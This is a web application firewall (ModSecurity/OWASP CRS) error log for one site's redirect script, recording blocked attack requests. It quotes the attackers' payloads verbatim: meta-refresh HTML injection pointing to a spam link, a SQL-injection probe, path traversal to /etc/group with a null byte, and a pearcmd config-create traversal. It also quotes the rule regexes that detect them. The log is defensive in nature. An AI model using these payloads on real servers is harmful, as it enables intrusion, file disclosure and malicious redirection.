[Tue May 12 05:36:22.866469 2026] [security2:error] [pid 1820198:tid 1820223] [client 194.233.64.127:59464] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5fYVI>10 Kampus Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5fYVI />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgNs1tk6y7yBJLpJo7YwAAAJc"]
[Tue May 12 05:36:22.866825 2026] [security2:error] [pid 1820198:tid 1820223] [client 194.233.64.127:59464] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgNs1tk6y7yBJLpJo7YwAAAJc"]
[Tue May 12 05:36:22.867125 2026] [security2:error] [pid 1820198:tid 1820223] [client 194.233.64.127:59464] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgNs1tk6y7yBJLpJo7YwAAAJc"]
[Tue May 12 05:36:23.499926 2026] [security2:error] [pid 1825179:tid 1825203] [client 194.233.64.127:59477] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5fyvi>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5fyvi />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgN9r1yOh9TvizezihWAAAAEU"]
[Tue May 12 05:36:23.500501 2026] [security2:error] [pid 1825179:tid 1825203] [client 194.233.64.127:59477] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5fYVI>10 Kampus Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5fYVI /> found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5fYVI>10 Kampus Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5fYVI />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgN9r1yOh9TvizezihWAAAAEU"]
[Tue May 12 05:36:23.500645 2026] [security2:error] [pid 1825179:tid 1825203] [client 194.233.64.127:59477] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=http://rlu.ru/5fYVI /> found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5fYVI>10 Kampus Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5fYVI />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgN9r1yOh9TvizezihWAAAAEU"]
[Tue May 12 05:36:23.500750 2026] [security2:error] [pid 1825179:tid 1825203] [client 194.233.64.127:59477] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5fYVI>10 Kampus Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5fYVI />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSens [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgN9r1yOh9TvizezihWAAAAEU"]
[Tue May 12 05:36:23.501020 2026] [security2:error] [pid 1825179:tid 1825203] [client 194.233.64.127:59477] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://rlu.ru/5fYVI>10 Kampus Terbaik Di Indonesia</a><meta http-equiv=refresh content=0;url=http://rlu.ru/5fYVI />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgN9r1yOh9TvizezihWAAAAEU"]
[Tue May 12 05:36:23.501382 2026] [security2:error] [pid 1825179:tid 1825203] [client 194.233.64.127:59477] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgN9r1yOh9TvizezihWAAAAEU"]
[Tue May 12 05:36:23.501740 2026] [security2:error] [pid 1825179:tid 1825203] [client 194.233.64.127:59477] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgN9r1yOh9TvizezihWAAAAEU"]
[Tue May 12 05:36:42.823501 2026] [security2:error] [pid 1844863:tid 1844893] [client 34.206.193.60:61548] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'sov' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: sov found within ARGS:url: https://www.piregwan-genesis.com/liens/redirect.php?url=https://slotmvp.co/*%G-\\x15A\\x15\\x01\\x07H2\\x22/@'G\\x1a*%G-\\x15A\\x15\\x01\\x07H2\\x22/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgSvaAnTZtx1_H_wy4jwAAAVg"]
[Tue May 12 05:36:42.823734 2026] [security2:error] [pid 1844863:tid 1844893] [client 34.206.193.60:61548] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgSvaAnTZtx1_H_wy4jwAAAVg"]
[Tue May 12 05:36:42.823991 2026] [security2:error] [pid 1844863:tid 1844893] [client 34.206.193.60:61548] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgSvaAnTZtx1_H_wy4jwAAAVg"]
[Tue May 12 05:36:42.841023 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=....//....//....//....//....//....//....//....//....//....//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgStr1yOh9TvizezihYgAAAFY"]
[Tue May 12 05:36:42.841078 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=....//....//....//....//....//....//....//....//....//....//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgStr1yOh9TvizezihYgAAAFY"]
[Tue May 12 05:36:42.841133 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ..../..../..../..../..../..../..../..../..../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgStr1yOh9TvizezihYgAAAFY"]
[Tue May 12 05:36:42.841695 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgStr1yOh9TvizezihYgAAAFY"]
[Tue May 12 05:36:42.841926 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgStr1yOh9TvizezihYgAAAFY"]
[Tue May 12 05:36:43.082723 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihaAAAAFY"]
[Tue May 12 05:36:43.082778 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihaAAAAFY"]
[Tue May 12 05:36:43.083013 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=....//....//....//....//....//....//....//....//....//....//etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihaAAAAFY"]
[Tue May 12 05:36:43.083056 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=....//....//....//....//....//....//....//....//....//....//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihaAAAAFY"]
[Tue May 12 05:36:43.083094 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=....//....//....//....//....//....//....//....//....//....//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihaAAAAFY"]
[Tue May 12 05:36:43.083156 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ..../..../..../..../..../..../..../..../..../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihaAAAAFY"]
[Tue May 12 05:36:43.083814 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 28)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihaAAAAFY"]
[Tue May 12 05:36:43.084078 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 28 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihaAAAAFY"]
[Tue May 12 05:36:43.321788 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Flib%2Fphp%2Fpearcmd&+config-create"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihagAAAFY"]
[Tue May 12 05:36:43.321857 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd& config-create"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihagAAAFY"]
[Tue May 12 05:36:43.321915 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd& config-create"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihagAAAFY"]
[Tue May 12 05:36:43.322737 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihagAAAFY"]
[Tue May 12 05:36:43.322986 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgS9r1yOh9TvizezihagAAAFY"]
